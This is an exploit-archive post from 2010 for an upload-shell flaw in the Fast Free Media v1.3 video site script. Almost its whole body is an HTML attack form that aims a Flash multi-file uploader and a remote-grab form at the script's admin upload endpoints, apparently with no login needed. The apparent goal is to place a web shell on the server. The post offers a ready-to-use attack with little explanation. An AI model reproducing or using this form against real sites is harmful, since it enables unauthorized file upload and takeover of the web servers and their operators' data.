Home / os / win7

Fast Free Media v1.3 Adult Site Upload Shell Exploit

Posted on 11 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Fast Free Media v1.3 Adult Site Upload Shell Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================== Fast Free Media v1.3 Adult Site Upload Shell Exploit ==================================================== ======================================================================================== | # Title : Fast Free Media V 1.3 Adult Site Upload Shell Exploiot | # Author : indoushka | # email : indoushka@hotmail.com | # Home : www.iqs3cur1ty.com | # Script : Powered by FastFreeMedia.com All Videos Copyright © To Their Respective Owners. All Rights Reserved. | # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu) | # Bug : Upload Shell | # Download : http://www.fastfreemedia.com/ ====================== Exploit By indoushka ================================= # Exploit : If you have FFMPEG installed you can convert your /media/uploads files to .flv &lt;a href=&quot;http://127.0.0.1/Ffm/admin/ffmpeg.php&quot;&gt;here&lt;/a&gt;. Or you can rebuild thumbnails using FFMPEG-PHP &lt;a href=&quot;http://127.0.0.1/Ffm/admin/ffmpeg.php?action=thumb&quot;&gt;here&lt;/a&gt;. &lt;div style=&quot;clear:both;height:20px;&quot;&gt;&amp;nbsp;&lt;/div&gt; &lt;div class=&quot;tabular_data&quot; id=&quot;uftd&quot;&gt; &lt;div class=&quot;header&quot;&gt;&lt;strong&gt;Select a Media File to Upload&lt;/strong&gt; Files will be uploaded to: &lt;em&gt;/media/upload&lt;/em&gt;&lt;/div&gt; &lt;table&gt; &lt;tr&gt; &lt;td align=&quot;center&quot;&gt;This flash tool has a built in size limit of 50Mb but kicks ass for anything under that. &lt;font style=&quot;font-size:10px;font-family:Verdana, Arial, Helvetica, sans-serif&quot; color=&quot;#494949&quot;&gt;&amp;nbsp; &lt;/font&gt;&lt;br&gt; &lt;OBJECT id=&quot;FlashFilesUpload&quot; codeBase=&quot;http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0&quot; width=&quot;450&quot; height=&quot;350&quot; classid=&quot;clsid:D27CDB6E-AE6D-11cf-96B8-444553540000&quot; VIEWASTEXT&gt; &lt;PARAM NAME=&quot;FlashVars&quot; VALUE=&quot;uploadUrl=http://127.0.0.1/Ffm/admin/uploadfiles.php&quot;&gt; &lt;PARAM NAME=&quot;BGColor&quot; VALUE=&quot;#F8F6E6&quot;&gt; &lt;PARAM NAME=&quot;Movie&quot; VALUE=&quot;http://127.0.0.1/Ffm/admin/ElementITMultiPowUpload1.7.swf&quot;&gt; &lt;PARAM NAME=&quot;Src&quot; VALUE=&quot;http://127.0.0.1/Ffm/admin/ElementITMultiPowUpload1.7.swf&quot;&gt; &lt;PARAM NAME=&quot;WMode&quot; VALUE=&quot;Window&quot;&gt; &lt;PARAM NAME=&quot;Play&quot; VALUE=&quot;-1&quot;&gt; &lt;PARAM NAME=&quot;Loop&quot; VALUE=&quot;-1&quot;&gt; &lt;PARAM NAME=&quot;Quality&quot; VALUE=&quot;High&quot;&gt; &lt;PARAM NAME=&quot;SAlign&quot; VALUE=&quot;&quot;&gt; &lt;PARAM NAME=&quot;Menu&quot; VALUE=&quot;-1&quot;&gt; &lt;PARAM NAME=&quot;Base&quot; VALUE=&quot;&quot;&gt; &lt;PARAM NAME=&quot;AllowScriptAccess&quot; VALUE=&quot;always&quot;&gt; &lt;PARAM NAME=&quot;Scale&quot; VALUE=&quot;ShowAll&quot;&gt; &lt;PARAM NAME=&quot;DeviceFont&quot; VALUE=&quot;0&quot;&gt; &lt;PARAM NAME=&quot;EmbedMovie&quot; VALUE=&quot;0&quot;&gt; &lt;PARAM NAME=&quot;SWRemote&quot; VALUE=&quot;&quot;&gt; &lt;PARAM NAME=&quot;MovieData&quot; VALUE=&quot;&quot;&gt; &lt;PARAM NAME=&quot;SeamlessTabbing&quot; VALUE=&quot;1&quot;&gt; &lt;PARAM NAME=&quot;Profile&quot; VALUE=&quot;0&quot;&gt; &lt;PARAM NAME=&quot;ProfileAddress&quot; VALUE=&quot;&quot;&gt; &lt;PARAM NAME=&quot;ProfilePort&quot; VALUE=&quot;0&quot;&gt; &lt;embed bgcolor=&quot;#F8F6E6&quot; id=&quot;EmbedFlashFilesUpload&quot; src=&quot;ElementITMultiPowUpload1.7.swf&quot; quality=&quot;high&quot; pluginspage=&quot;http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash&quot; type=&quot;application/x-shockwave-flash&quot; width=&quot;450&quot; height=&quot;350&quot; flashvars=&quot;uploadUrl=uploadfiles.php?username=&lt;?php echo&quot;$username&quot;;?&gt;&quot;&gt; &lt;/embed&gt; &lt;/OBJECT&gt; &lt;/td&gt; &lt;/tr&gt; &lt;/table&gt; &lt;table&gt; &lt;form action=&quot;http://127.0.0.1/Ffm/admin/wget.php?action=image&amp;movie=1&quot; method=&quot;post&quot;&gt; &lt;tr&gt; &lt;td&gt;Grab from Remote server &lt;em&gt;&lt;/em&gt;&lt;/td&gt; &lt;td&gt;&lt;span class=&quot;form&quot;&gt; &lt;input name=&quot;rmtimage&quot; type=&quot;text&quot; size=&quot;90&quot; /&gt; &lt;/span&gt;&lt;/td&gt; &lt;td class=&quot;last&quot;&gt;&lt;input type=&quot;submit&quot; value=&quot;Grab File&quot; /&gt;&lt;/td&gt; &lt;/tr&gt; &lt;/form&gt; &lt;/table&gt; &lt;/div&gt; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-11]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP